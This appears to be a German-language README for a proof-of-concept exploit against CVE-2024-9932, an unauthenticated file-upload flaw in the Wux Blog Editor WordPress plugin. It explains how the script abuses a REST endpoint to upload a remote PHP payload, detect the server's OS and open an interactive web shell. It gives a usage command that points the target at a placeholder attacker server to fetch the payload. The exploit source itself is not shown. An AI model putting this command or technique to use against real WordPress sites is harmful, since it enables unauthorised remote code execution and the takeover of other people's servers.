Nicht authentifizierter 0-Click-RCE-Exploit für CVE-2024-9932. Nutzt eine Schwachstelle für beliebige Datei-Uploads im Wux Blog Editor WordPress-Plugin aus, um ein Remote-PHP-Payload hochzuladen, das Zielbetriebssystem zu erkennen und Remote-Befehlsausführung durch eine interaktive Web-Shell zu erreichen.

Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2024-9932, eine nicht authentifizierte Schwachstelle zum willkürlichen Hochladen von Dateien im Wux Blog Editor WordPress-Plugin, die zu Remote-Befehlsausführung (RCE) führt.
Das Skript missbraucht einen anfälligen REST-Endpunkt, um ohne Authentifizierung ein entferntes PHP-Payload hochzuladen. Nach dem Hochladen rekonstruiert es den endgültigen Dateipfad, erkennt das Zielbetriebssystem und stellt eine interaktive Remote-Shell für die Befehlsausführung bereit.
python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
Nach der Ausführung lädt das Skript das Payload hoch, bestätigt dessen Zugänglichkeit, erkennt das Betriebssystem und wechselt in eine interaktive Shell.